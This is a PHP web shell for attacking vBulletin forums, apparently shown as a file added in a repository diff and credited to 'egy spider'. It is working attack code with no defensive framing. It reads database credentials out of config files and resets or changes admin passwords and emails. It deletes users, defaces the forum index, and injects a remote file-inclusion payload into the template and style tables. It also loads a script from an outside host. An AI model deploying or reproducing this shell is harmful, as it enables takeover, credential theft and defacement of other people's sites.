BACKGROUND-COLOR: #000000;
|
||||
color: #dadada;
|
||||
}
|
||||
input {
|
||||
BORDER-RIGHT: #00FF00 1 solid;
|
||||
BORDER-TOP: #00FF00 1 solid;
|
||||
BORDER-LEFT: #00FF00 1 solid;
|
||||
BORDER-BOTTOM: #00FF00 1 solid;
|
||||
BACKGROUND-COLOR: #333333;
|
||||
font: 9pt tahoma;
|
||||
color: #ffffff;
|
||||
}
|
||||
select {
|
||||
BORDER-RIGHT: #ffffff 1 solid;
|
||||
BORDER-TOP: #999999 1 solid;
|
||||
BORDER-LEFT: #999999 1 solid;
|
||||
BORDER-BOTTOM: #ffffff 1 solid;
|
||||
BACKGROUND-COLOR: #000000;
|
||||
font: 9pt tahoma;
|
||||
color: #dadada;;
|
||||
}
|
||||
submit {
|
||||
BORDER: buttonhighlight 1 outset;
|
||||
BACKGROUND-COLOR: #272727;
|
||||
width: 40%;
|
||||
color: #dadada;
|
||||
}
|
||||
textarea {
|
||||
BORDER-RIGHT: #ffffff 1 solid;
|
||||
BORDER-TOP: #999999 1 solid;
|
||||
BORDER-LEFT: #999999 1 solid;
|
||||
BORDER-BOTTOM: #ffffff 1 solid;
|
||||
BACKGROUND-COLOR: #333333;
|
||||
font: Fixedsys bold;
|
||||
color: #ffffff;
|
||||
}
|
||||
BODY {
|
||||
margin: 1;
|
||||
color: #dadada;
|
||||
background-color: #000000;
|
||||
}
|
||||
A:link {COLOR:red; TEXT-DECORATION: none}
|
||||
A:visited { COLOR:red; TEXT-DECORATION: none}
|
||||
A:active {COLOR:red; TEXT-DECORATION: none}
|
||||
A:hover {color:blue;TEXT-DECORATION: none}
|
||||
|
||||
</STYLE>
|
||||
</head>
|
||||
<body bgcolor="#000000" text="lime" link="lime" vlink="lime">
|
||||
<center>
|
||||
<?
|
||||
$act = $_GET['act'];
|
||||
if($act=='reconfig' && isset($_POST['path']))
|
||||
{
|
||||
$path = $_POST['path'];
|
||||
include $path;
|
||||
?>
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime"><th>::::Read Config Data::::</th><th><? echo '<font color=yellow>' . $path . '</font>'; ?></th>
|
||||
<tr>
|
||||
<th>Host : </th><th><? echo '<font color=yellow>' . $config['MasterServer']['servername'] . '</font>'; ?></th>
|
||||
</tr>
|
||||
<tr>
|
||||
<th>User : </th><th><? echo '<font color=yellow>' . $config['MasterServer']['username'] . '</font>'; ?></th>
|
||||
</tr>
|
||||
<tr>
|
||||
<th>Pass : </th><th><?
|
||||
$passsql = $config['MasterServer']['password'];
|
||||
if ($passsql == '')
|
||||
{
|
||||
$result = '<font color=red>No Password</font>';
|
||||
} else {
|
||||
$result = '<font color=yellow>' . $passsql . '</font>';
|
||||
}
|
||||
echo $result; ?></th>
|
||||
</tr>
|
||||
<tr>
|
||||
<th>Name : </th><th><? echo '<font color=yellow>' . $config['Database']['dbname'] . '</font>'; ?></th>
|
||||
</tr>
|
||||
</table>
|
||||
<?
|
||||
}
|
||||
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="del" && isset($_POST['vbuser']) )
|
||||
{
|
||||
$host = $_POST['host'];
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['pass'];
|
||||
$db = $_POST['db'];
|
||||
$vbuser = $_POST['vbuser'];
|
||||
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
|
||||
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
|
||||
if ($pass == '')
|
||||
{
|
||||
$npass = 'NULL';
|
||||
} else {
|
||||
$npass = $pass;
|
||||
}
|
||||
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
|
||||
?>
|
||||
<hr color="#00FF00" />
|
||||
<?
|
||||
$query = 'delete * from user where username="' . $vbuser . '";';
|
||||
$r = mysql_query($query);
|
||||
if ($r)
|
||||
{
|
||||
echo '<font color=yellow>User : ' . $vbuser . ' was deleted</font>';
|
||||
} else {
|
||||
echo '<font color=red>User : ' . $vbuser . ' could not be deleted</font>';
|
||||
}
|
||||
}
|
||||
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="shell" && isset($_POST['var']))
|
||||
{
|
||||
$host = $_POST['host'];
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['pass'];
|
||||
$db = $_POST['db'];
|
||||
$var = $_POST['var'];
|
||||
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
|
||||
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
|
||||
if ($pass == '')
|
||||
{
|
||||
$npass = 'NULL';
|
||||
} else {
|
||||
$npass = $pass;
|
||||
}
|
||||
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
|
||||
?>
|
||||
<hr color="#00FF00" />
|
||||
<?
|
||||
$Wdt = 'UPDATE `template` SET `template` = \' ".print include($HTTP_GET_VARS[' . $var . '])." \'WHERE `title` =\'FORUMHOME\';';
|
||||
$Wdt2= 'UPDATE `style` SET `css` = \' ".print include($HTTP_GET_VARS[' . $var . '])." \', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;';
|
||||
$result=mysql_query($Wdt);
|
||||
if ($result) {echo "<p>Done Exploit.</p><br>Use this : <br> index.php?" . $var . "=shell.txt";}else{
|
||||
echo "<p>Error</p>";}
|
||||
$result1=mysql_query($Wdt2);
|
||||
if ($result1) { echo "<p>Done Create File</p><br>Use this : <br> index.php?" . $var . "=shell.txt";} else{ echo "<p>Error</p>";}
|
||||
}
|
||||
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="code" && isset($_POST['code']))
|
||||
{
|
||||
$host = $_POST['host'];
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['pass'];
|
||||
$db = $_POST['db'];
|
||||
$index = $_POST['code'];
|
||||
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
|
||||
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
|
||||
if ($pass == '')
|
||||
{
|
||||
$npass = 'NULL';
|
||||
} else {
|
||||
$npass = $pass;
|
||||
}
|
||||
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
|
||||
?>
|
||||
<hr color="#00FF00" />
|
||||
<?
|
||||
$index = $_POST['b'];
|
||||
$Wdt = 'UPDATE `template` SET `template` = \' ' . $index . ' \'WHERE `title` =\'FORUMHOME\';';
|
||||
$Wdt2= 'UPDATE `style` SET `css` = \' ' . $index . ' \', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;';
|
||||
$result=mysql_query($Wdt);
|
||||
if ($result) {echo "<p>Index was Changed Succefully</p>";}else{
|
||||
echo "<p>Failed to change index</p>";}
|
||||
$result1=mysql_query($Wdt2);
|
||||
if ($result1) {echo "<p>Done Create File</p>";} else{ echo "<p>Error</p>";}
|
||||
}
|
||||
|
||||
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="inc" && isset($_POST['link']))
|
||||
{
|
||||
$host = $_POST['host'];
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['pass'];
|
||||
$db = $_POST['db'];
|
||||
$vblink = $_POST['link'];
|
||||
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
|
||||
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
|
||||
if ($pass == '')
|
||||
{
|
||||
$npass = 'NULL';
|
||||
} else {
|
||||
$npass = $pass;
|
||||
}
|
||||
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
|
||||
?>
|
||||
<hr color="#00FF00" />
|
||||
<?
|
||||
$hack15 = 'UPDATE `template` SET `template` = \'$spacer_open
|
||||
{${include(\'\'' . $vblink . '\'\')}}{${exit()}}&
|
||||
$_phpinclude_output\'WHERE `title` =\'FORUMHOME\';';
|
||||
$hack= 'UPDATE `style` SET `css` = \'$spacer_open
|
||||
{${include(\'\'' . $vblink .'\'\')}}{${exit()}}&
|
||||
$_phpinclude_output\', `stylevars` = \'\', `csscolors` = \'\', `editorstyles` = \'\' ;';
|
||||
$result=mysql_query($hack15) or die(mysql_error());
|
||||
$result=mysql_query($hack) or die(mysql_error());
|
||||
}
|
||||
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="mail" && isset($_POST['vbuser']) && isset($_POST['vbmail']))
|
||||
{
|
||||
$host = $_POST['host'];
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['pass'];
|
||||
$db = $_POST['db'];
|
||||
$vbuser = $_POST['vbuser'];
|
||||
$vbmail = $_POST['vbmail'];
|
||||
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
|
||||
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
|
||||
if ($pass == '')
|
||||
{
|
||||
$npass = 'NULL';
|
||||
} else {
|
||||
$npass = $pass;
|
||||
}
|
||||
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
|
||||
?>
|
||||
<hr color="#00FF00" />
|
||||
<?
|
||||
$query = 'update user set email="' . $vbmail . '" where username="' . $vbuser . '";';
|
||||
$re = mysql_query($query);
|
||||
if ($re)
|
||||
{
|
||||
echo '<font size=3><font color=yellow>The E-MAIL of the user </font><font color=red>' . $vbuser . '</font><font color=yellow> was changed to </font><font color=red>' . $vbmail . '</font><br>Back to <a href="?">Shell</a></font>';
|
||||
} else {
|
||||
echo '<font size=3><font color=red>Failed to change E-MAIL</font></font>';
|
||||
}
|
||||
}
|
||||
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="psw" && isset($_POST['vbuser']) && isset($_POST['vbpass']))
|
||||
{
|
||||
$host = $_POST['host'];
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['pass'];
|
||||
$db = $_POST['db'];
|
||||
$vbuser = $_POST['vbuser'];
|
||||
$vbpass = $_POST['vbpass'];
|
||||
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
|
||||
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
|
||||
if ($pass == '')
|
||||
{
|
||||
$npass = 'NULL';
|
||||
} else {
|
||||
$npass = $pass;
|
||||
}
|
||||
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
|
||||
?>
|
||||
<hr color="#00FF00" />
|
||||
<?
|
||||
$query = 'select * from user where username="' . $vbuser . '";';
|
||||
$result = mysql_query($query);
|
||||
while ($row = mysql_fetch_array($result))
|
||||
{
|
||||
$salt = $row['salt'];
|
||||
$x = md5($vbpass);
|
||||
$x =$x . $salt;
|
||||
$pass_salt = md5($x);
|
||||
$query = 'update user set password="' . $pass_salt . '" where username="' . $vbuser . '";';
|
||||
$re = mysql_query($query);
|
||||
if ($re)
|
||||
{
|
||||
echo '<font size=3><font color=yellow>The pass of the user </font><font color=red>' . $vbuser . '</font><font color=yellow> was changed to </font><font color=red>' . $vbpass . '</font><br>Back to <a href="?">Shell</a></font>';
|
||||
} else {
|
||||
echo '<font size=3><font color=red>Failed to change PassWord</font></font>';
|
||||
}
|
||||
}
|
||||
}
|
||||
if(isset($_POST['host']) && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['db']) && $act=="login")
|
||||
{
|
||||
$host = $_POST['host'];
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['pass'];
|
||||
$db = $_POST['db'];
|
||||
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
|
||||
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
|
||||
if ($pass == '')
|
||||
{
|
||||
$npass = 'NULL';
|
||||
} else {
|
||||
$npass = $pass;
|
||||
}
|
||||
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
|
||||
?>
|
||||
<hr color="#00FF00" />
|
||||
<form name="changepass" action="?act=psw" method="post">
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime">
|
||||
<th>:::::Change User Password:::::</th><th><input type="submit" name="Change" value="Change" /></th>
|
||||
<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
|
||||
<tr><td>Pass : </td><td><input name="vbpass" value="egy spider" /></td></tr>
|
||||
</table>
|
||||
<?
|
||||
echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
|
||||
?>
|
||||
</form>
|
||||
<hr color="#00FF00" />
|
||||
<form name="changepass" action="?act=mail" method="post">
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime">
|
||||
<th>:::::Change User E-MAIL:::::</th><th><input type="submit" name="Change" value="Change" /></th>
|
||||
<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
|
||||
<tr><td>MAIL : </td><td><input name="vbmail" value="egy_spider@hotmail.com" /></td></tr>
|
||||
</table>
|
||||
<?
|
||||
echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
|
||||
?>
|
||||
</form>
|
||||
<hr color="#00FF00" />
|
||||
<form name="changepass" action="?act=del" method="post">
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime">
|
||||
<th>:::::Delete a user:::::</th><th><input type="submit" name="Change" value="Change" /></th>
|
||||
<tr><td>User : </td><td><input name="vbuser" value="admin" /></td></tr>
|
||||
</table>
|
||||
<?
|
||||
echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
|
||||
?>
|
||||
</form>
|
||||
<hr color="#00FF00" />
|
||||
<form name="changepass" action="?act=inc" method="post">
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime">
|
||||
<th>:::::Change Index by Inclusion(Not PL(Al-Massya)):::::</th><th><input type="submit" name="Change" value="Change" /></th>
|
||||
<tr><td>Index Link : </td><td><input name="link" value="http://www.egyspider.com/hacked.html" /></td></tr>
|
||||
</table>
|
||||
<?
|
||||
echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
|
||||
?>
|
||||
</form>
|
||||
<hr color="#00FF00" />
|
||||
<form name="changepass" action="?act=code" method="post">
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime">
|
||||
<th>:::::Change Index by Code(All Edition):::::</th><th><input type="submit" name="Change" value="Change" /></th>
|
||||
<tr><td>Index Code : </td><td><textarea name="code" cols=60 rows=20></textarea></td></tr>
|
||||
</table>
|
||||
<?
|
||||
echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
|
||||
?>
|
||||
</form>
|
||||
<hr color="#00FF00" />
|
||||
<form name="changepass" action="?act=shell" method="post">
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime">
|
||||
<th>:::::Inject FileInclusion Exploit(NOT PL(AL-MASSYA)):::::</th><th><input type="submit" name="Change" value="Change" /></th>
|
||||
<tr><td>Variable : </td><td><input name="var" value="shell" /></td></tr>
|
||||
</table>
|
||||
<?
|
||||
echo'<input type="hidden" name="host" value="' . $host . '"><input type="hidden" name="user" value="' . $user . '"><input type="hidden" name="pass" value="' . $pass . '"><input type="hidden" name="db" value="' . $db . '">';
|
||||
?>
|
||||
</form>
|
||||
<?
|
||||
}
|
||||
if ($act == ''){
|
||||
?>
|
||||
<form name="myform" action="?act=login" method="post">
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime">
|
||||
<th>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect" /></th><tr><td>Host : </td><td><input name="host" value="localhost" /></td></tr>
|
||||
<tr><td>User : </td><td><input name="user" value="root" /></td></tr>
|
||||
<tr><td>Pass : </td><td><input name="pass" value="" /></td></tr>
|
||||
<tr><td>Name : </td><td><input name="db" value="vb" /></td></tr>
|
||||
</table>
|
||||
</form>
|
||||
|
||||
<?
|
||||
}
|
||||
if ($act == 'lst' && isset($_POST['user']) && isset($_POST['pass']) && isset($_POST['host']) && isset($_POST['db']))
|
||||
{
|
||||
$host = $_POST['host'];
|
||||
$user = $_POST['user'];
|
||||
$pass = $_POST['pass'];
|
||||
$db = $_POST['db'];
|
||||
mysql_connect($host,$user,$pass) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with user</font>');
|
||||
mysql_select_db($db) or die('<font color=red>Nope,</font><font color=yellow>No cOnnection with DB</font>');
|
||||
if ($pass == '')
|
||||
{
|
||||
$npass = 'NULL';
|
||||
} else {
|
||||
$npass = $pass;
|
||||
}
|
||||
echo'<font size=3>You are connected with the mysql server of <font color=yellow>' . $host . '</font> by user : <font color=yellow>' . $user . '</font> , pass : <font color=yellow>' . $npass . '</font> and selected DB with the name <font color=yellow>' . $db . '</font></font>';
|
||||
?>
|
||||
<hr color="#00FF00" />
|
||||
<?
|
||||
$re = mysql_query('select * from user');
|
||||
echo'<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime"><th>ID</th><th>USERNAME</th><th>EMAIL</th>';
|
||||
while ($row = mysql_fetch_array($re))
|
||||
{
|
||||
echo'<tr><td>' . $row['userid'] . '</td><td>' . $row['username'] . '</td><td>' . $row['email'] . '</td></tr>';
|
||||
}
|
||||
echo'</table>';
|
||||
?>
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime"><th><?
|
||||
$count = mysql_num_rows($re);
|
||||
echo 'Number of users registered is : [ ' . $count . ' ]';
|
||||
?></th></table>
|
||||
<?
|
||||
}
|
||||
if ($act == 'users'){
|
||||
?>
|
||||
<form name="myform" action="?act=lst" method="post">
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime">
|
||||
<th>:::::DATABASE CONFIG:::::</th><th><input type="submit" name="Connect" value="Connect" /></th><tr><td>Host : </td><td><input name="host" value="localhost" /></td></tr>
|
||||
<tr><td>User : </td><td><input name="user" value="root" /></td></tr>
|
||||
<tr><td>Pass : </td><td><input name="pass" value="" /></td></tr>
|
||||
<tr><td>Name : </td><td><input name="db" value="vb" /></td></tr>
|
||||
</table>
|
||||
</form>
|
||||
<?
|
||||
}
|
||||
if ($act=='config')
|
||||
{
|
||||
?>
|
||||
<form name="myform" action="?act=reconfig" method="post">
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime">
|
||||
<th>:::::CONFIG PATH:::::</th><th><input type="submit" name="Connect" value="Read" /></th>
|
||||
<tr><td>PATH : </td><td><input name="path" value="/home/hacked/public_html/vb/includes/config.php" /></td></tr></table></form>
|
||||
<?
|
||||
}
|
||||
if ($act=='index')
|
||||
{
|
||||
// Index Editor<HTML Editor>
|
||||
?>
|
||||
<script language='javascript'>
|
||||
function link(){
|
||||
var X = prompt("EnterText","")
|
||||
if (X=="" | X==null ) {
|
||||
return;
|
||||
}
|
||||
var y = prompt("Enterlink","")
|
||||
if (y=="" | y==null ) {
|
||||
return;
|
||||
}
|
||||
|
||||
indexform.index.value=indexform.index.value + "<a href=" + y +">"+X+"</a>";
|
||||
|
||||
}
|
||||
|
||||
function right(){
|
||||
var X = prompt("Enter Text","")
|
||||
if (X=="" | X==null ) {
|
||||
return;
|
||||
}
|
||||
indexform.index.value=indexform.index.value + "<p align='right'>"+X+"</p>";
|
||||
|
||||
}
|
||||
function left(){
|
||||
var X = prompt("Enter Text","")
|
||||
if (X=="" | X==null ) {
|
||||
return;
|
||||
}
|
||||
indexform.index.value=indexform.index.value + "<p align='left'>"+X+"</p>";
|
||||
|
||||
}
|
||||
function center(){
|
||||
var X = prompt("Enter Text","")
|
||||
if (X=="" | X==null ) {
|
||||
return;
|
||||
}
|
||||
indexform.index.value=indexform.index.value + "<center>"+X+"</center>";
|
||||
|
||||
}
|
||||
function colour(){
|
||||
var X = prompt("EnterText","")
|
||||
if (X=="" | X==null ) {
|
||||
return;
|
||||
}
|
||||
var y = prompt("EnterColour","")
|
||||
if (y=="" | y==null ) {
|
||||
return;
|
||||
}
|
||||
|
||||
indexform.index.value=indexform.index.value + "<font color=" + y +">"+X+"</font>";
|
||||
|
||||
}
|
||||
function b(){
|
||||
var X = prompt("Enter Text","")
|
||||
if (X=="" | X==null ) {
|
||||
return;
|
||||
}
|
||||
indexform.index.value=indexform.index.value + "<B>"+X+"</B>";
|
||||
|
||||
}
|
||||
function u(){
|
||||
var X = prompt("Enter Text","")
|
||||
if (X=="" | X==null ) {
|
||||
return;
|
||||
}
|
||||
indexform.index.value=indexform.index.value + "<U>"+X+"</U>";
|
||||
|
||||
}
|
||||
function i(){
|
||||
var X = prompt("Enter Text","")
|
||||
if (X=="" | X==null ) {
|
||||
return;
|
||||
}
|
||||
indexform.index.value=indexform.index.value + "<I>"+X+"</I>";
|
||||
|
||||
}
|
||||
function mar(){
|
||||
var X = prompt("Enter Text","")
|
||||
if (X=="" | X==null ) {
|
||||
return;
|
||||
}
|
||||
indexform.index.value=indexform.index.value + "<marquee>"+X+"</marquee>";
|
||||
|
||||
}
|
||||
function img(){
|
||||
var X = prompt("Enter link","")
|
||||
if (X=="" | X==null ) {
|
||||
return;
|
||||
}
|
||||
indexform.index.value=indexform.index.value + "<img src='"+X+"'></img>";
|
||||
|
||||
}
|
||||
function br(){
|
||||
indexform.index.value=indexform.index.value + "<br>";
|
||||
|
||||
}
|
||||
</script>
|
||||
<table border="1" bordercolor="#008000" bordercolordark="#008000"
|
||||
bordercolorlight="#008000"><th><a onclick='return center()'>Center</a> ||| <a onclick='return left()'>Left</a> ||| <a onclick='return right()'>right</a> ||| <a onclick='return b()'>Bold</a> ||| <a onclick='return u()'>UnderLine</a> ||| <a onclick='return i()'>Italic</a> ||| <a onclick='return br()'>NewLine</a> ||| <a onclick='return colour()'>Colour</a> ||| <a onclick='return mar()'>Marquee ||| <a onclick='return img()'>Picture</a> ||| <a onclick='return link()'>Link</a></a></th><tr><TD>
|
||||
<center><form name="indexform" action="" method="post"><textarea name='index' rows='14' cols='86'></textarea></p>
|
||||
</form></form></center>
|
||||
<SCRIPT SRC=http://www.r57.biz/yazciz/ciz.js></SCRIPT>
|
||||
</TD></tr><tr><td>Copy The Code after Finishing your index</td></tr></table>
|
||||
<?
|
||||
}
|
||||
?>
|
||||
<hr color="#00FF00" />
|
||||
<table border="1" bgcolor="#000000" bordercolor="lime"
|
||||
bordercolordark="lime" bordercolorlight="lime"><tr><td><a href="?">Main Shell</a></td><td><a href="?act=users">List Users</a></td><td><a href="?act=index">Index Maker</a></td><td><a href="?act=config">ReadConfig</a></td></tr></table>
|
||||
<p align="center">www.egyspider.com</p>
|
||||
<DIV id="n" align="center">
|
||||
<TABLE borderColor="#111111" cellSpacing="0" cellPadding="0" width="100%" border="1">
|
||||
<TBODY>
|
||||
<TR>
|
||||
<TD width="100%"><p align="center"><STRONG>o---[ r57.biz | | <A egy_spider@hotmail.com>egy_spider@hotmail.com</A> |developer by egy spider (ahmed rageh) ]---o</STRONG></p></TD>
|
||||
</TR>
|
||||
</TBODY>
|
||||
</TABLE>
|
||||
</DIV>
|
||||
</center>
|
||||
</body>
|
||||
</html>
|
1973
php/sadrazam.php
Normal file
1973
php/sadrazam.php
Normal file
File diff suppressed because it is too large
Load diff
Loading…
Reference in a new issue